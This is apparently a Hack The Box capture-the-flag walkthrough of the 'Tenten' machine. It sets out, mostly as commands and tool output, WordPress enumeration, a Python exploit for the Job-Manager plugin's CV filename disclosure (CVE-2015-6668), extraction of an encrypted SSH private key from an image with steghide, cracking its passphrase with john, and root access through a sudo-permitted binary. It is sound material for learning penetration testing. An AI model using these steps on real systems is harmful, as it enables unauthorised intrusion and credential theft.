HTB - Tenten

Tenten

Getting Root:

1. Discovered the box is using WordPress 4.7.3 which has vulnerable plugin

2. Exploiting the vulnerable plugin takes us a protected link with an image

3. Using steghide on the image gives us a private ssh key and we get a shell

4. To get root, we abuse an executable with SUID

Nmap

nmap -sC -sV -p- -oA nmap/Tenten                                
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 21:56 EST                                  
WARNING: No targets were specified, so 0 hosts scanned.                                                                
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.51 seconds                                                         
root@kdeali:~/HackTheBox/Tenten# nmap -sC -sV -p- -oA nmap/Tenten 10.10.10.10                                                                                                                                                                 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 21:56 EST                                                        
Nmap scan report for 10.10.10.10      
Host is up (0.042s latency).                                                                     
Not shown: 65533 filtered ports                                                                  
PORT   STATE SERVICE VERSION                                                                     
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                                                   
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)       
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)       
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)     
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))                  
|_http-generator: WordPress 4.7.3                                                                
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                     
|_http-title: Job Portal – Just another WordPress site         
| vulners:                                                                                       
|   cpe:/a:apache:http_server:2.4.18:                                                            
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169 
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788 
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333                                                  
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798                         
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743                                                  
|       CVE-2016-8740   5.0     https://vulners.com/cve/CVE-2016-8740                                                  
|       CVE-2016-4979   5.0     https://vulners.com/cve/CVE-2016-4979                                                  
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197                                                  
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092                                                 
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763                                                 
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975                                                  
|       CVE-2016-1546   4.3     https://vulners.com/cve/CVE-2016-1546                                                  
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283                                                  
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612                                                  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                         
Nmap done: 1 IP address (1 host up) scanned in 115.10 seconds     

Services

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))                  

View Source

A quick visit to http://10.10.10.10 and view source reveals WordPress 4.7.3

Gobuster

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.10
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/02/27 22:02:58 Starting gobuster
===============================================================
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-admin (Status: 301)
/server-status (Status: 403)
===============================================================
2020/02/27 22:06:03 Finished
===============================================================

Wpscan

wpscan --url http://10.10.10.10 --enumerate u

_______________________________________________________________                                                                                                                                                                               
         __          _______   _____                                                                                                                                                                                                          
         \ \        / /  __ \ / ____|                                                                                                                                                                                                         
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                                                                                                                        
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                                                                                         
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                                                                                        
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                                                                                        
                                                                                                                                                                                                                                              
         WordPress Security Scanner by the WPScan Team                                                                                                                                                                                        
                         Version 3.7.8                                                                                                                                                                                                        
       Sponsored by Automattic - https://automattic.com/                                                                                                                                                                                      
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                                                                                                                                                                                        
_______________________________________________________________                                                                                                                                                                               
                                                                                                                                                                                                                                              
[+] URL: http://10.10.10.10/        
                                                                                                                                                                                                                                              
Interesting Finding(s):                                                                                                                                                                                                                       
                        

[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.10/index.php/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - http://10.10.10.10/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>


[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] takis
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
    
    
[+] job-manager                                                                                                                                                                                                                               
 | Location: http://10.10.10.10/wp-content/plugins/job-manager/                                                                                                                                                                               
 | Latest Version: 0.7.25 (up to date)                                                                                                                                                                                                        
 | Last Updated: 2015-08-25T22:44:00.000Z                                                                                                                                                                                                     
 |                                                                                                                                                                                                                                            
 | Found By: Urls In Homepage (Passive Detection)                                                                                                                                                                                             
 |                                                                                                                                                                                                                                            
 | Version: 7.2.5 (80% confidence)                                                                                                                                                                                                            
 | Found By: Readme - Stable Tag (Aggressive Detection)                                                                                                                                                                                       
 |  - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt     
 

Research on job-manager plugin

Google research on "WordPress job-manager 7.2.5" https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

[CVE-2015-6668] CV filename disclosure on Job-Manager WP plugin
Title: CV filename disclosure on Job-Manager WP plugin
Date: 08/25/2015 
CVE-ID: 2015-6668 
Author: Evangelos Mourikis Blog URL: 
https://vagmour.eu
Twitter: @teh_h3ck 
Versions: <= 0.7.25 
Plugin URLs: 
1. http://www.wp-jobmanager.com
2. https://wordpress.org/plugins/job-manager/

From the website we can easily browse the different job applications

To make this easier, I created a simple bash script to search for all job applications:

for bull in {1..20}; do echo -n "Doing: $bull"; curl -s http://10.10.10.10/index.php/jobs/apply/$bull/ | grep '<title>Job Application'; done      
Doing: 1<title>Job Application: Hello world! &#8211; Job Portal</title>
Doing: 2<title>Job Application: Sample Page &#8211; Job Portal</title>
Doing: 3<title>Job Application: Auto Draft &#8211; Job Portal</title>
Doing: 4<title>Job Application &#8211; Job Portal</title>
Doing: 5<title>Job Application: Jobs Listing &#8211; Job Portal</title>
Doing: 6<title>Job Application: Job Application &#8211; Job Portal</title>
Doing: 7<title>Job Application: Register &#8211; Job Portal</title>
Doing: 8<title>Job Application: Pen Tester &#8211; Job Portal</title>
Doing: 9<title>Job Application:  &#8211; Job Portal</title>
Doing: 10<title>Job Application: Application &#8211; Job Portal</title>
Doing: 11<title>Job Application: cube &#8211; Job Portal</title>
Doing: 12<title>Job Application: Application &#8211; Job Portal</title>
Doing: 13<title>Job Application: HackerAccessGranted &#8211; Job Portal</title>
Doing: 14<title>Job Application &#8211; Job Portal</title>
Doing: 15<title>Job Application &#8211; Job Portal</title>
Doing: 16<title>Job Application &#8211; Job Portal</title>
Doing: 17<title>Job Application &#8211; Job Portal</title>
Doing: 18<title>Job Application &#8211; Job Portal</title>
Doing: 19<title>Job Application &#8211; Job Portal</title>
Doing: 20<title>Job Application &#8211; Job Portal</title>

The one that is very interesting is Number 13: Doing: 13<title>Job Application: HackerAccessGranted &#8211; Job Portal</title>

Let's use the python exploit from the page we found with the job-manager plugin discussing the CVE. I changed the year range given that WordPress was showing 2017 and I also added a few additional extensions.

#!/usr/bin/env python
import requests

print """  
CVE-2015-6668  
Title: CV filename disclosure on Job-Manager WP Plugin  
Author: Evangelos Mourikis  
Blog: https://vagmour.eu  
Plugin URL: http://www.wp-jobmanager.com  
Versions: <=0.7.25  
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2017,2018):  
    for i in range(1,13):
        for extension in {'jpeg', 'jpg', 'png', 'php', 'doc','pdf','docx'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

Running the python exploit

chmod +x exploit.py 
./exploit.py 
  
CVE-2015-6668  
Title: CV filename disclosure on Job-Manager WP Plugin  
Author: Evangelos Mourikis  
Blog: https://vagmour.eu  
Plugin URL: http://www.wp-jobmanager.com  
Versions: <=0.7.25  

Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg   

Visiting the link shows an image

Analyzing the image

strings HackerAccessGranted.jpg 
# Nothing insteresting

binwalk HackerAccessGranted.jpg
# Nothing insteresting
 
steghide --extract -sf HackerAccessGranted.jpg 
Enter passphrase: 
# It asked for a passphrase, so I just hit "Enter"
wrote extracted data to "id_rsa".

Cracking the ssh private key

file id_rsa 
id_rsa: PEM RSA private key
cat id_rsa 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

/HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf
K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm
SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH
WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP
VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT
J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw
AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g
2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo
6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA
pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk
tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm
KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9
4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF
2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7
L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS
VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv
5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r
Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W
p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf
yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB
9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO
vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J
YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP
-----END RSA PRIVATE KEY-----

# Using ssh2john
ssh2john.py id_rsa > id_rsa_john_hash

# Using john with rockyou wordlist
john --wordlist=/root/HackTheBox/rockyou.txt id_rsa_john_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2020-02-27 23:51) 0.1751g/s 2511Kp/s 2511Kc/s 2511KC/sa6_123..*7¡Vamos!
Session completed

Accessing the box

# Using correct permissions on the private key id_rsa
chmod 600 id_rsa

# ssh to the box using username root or takis which are the two users we know
# It fails with root
ssh -i id_rsa root@10.10.10.10
Enter passphrase for key 'id_rsa': 
root@10.10.10.10's password: 
Permission denied, please try again.
root@10.10.10.10's password: 
Permission denied, please try again.
root@10.10.10.10's password: 
root@10.10.10.10: Permission denied (publickey,password).


# Trying with username takis found on wpscan enumeration
ssh -i id_rsa takis@10.10.10.10
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.


Last login: Fri May  5 23:05:36 2017

Privilege Escalation

takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
takis@tenten:~$ sudo /bin/fuckin whoami
root


takis@tenten:~$ sudo /bin/fuckin /bin/bash
root@tenten:~# id
uid=0(root) gid=0(root) groups=0(root)


root@tenten:~# ifconfig
ens34     Link encap:Ethernet  HWaddr 00:50:56:b9:93:b6  
          inet addr:10.10.10.10  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:93b6/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:93b6/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:487142 errors:0 dropped:0 overruns:0 frame:0
          TX packets:477719 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:77437579 (77.4 MB)  TX bytes:237049609 (237.0 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:793 errors:0 dropped:0 overruns:0 frame:0
          TX packets:793 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:74479 (74.4 KB)  TX bytes:74479 (74.4 KB)

root@tenten:~#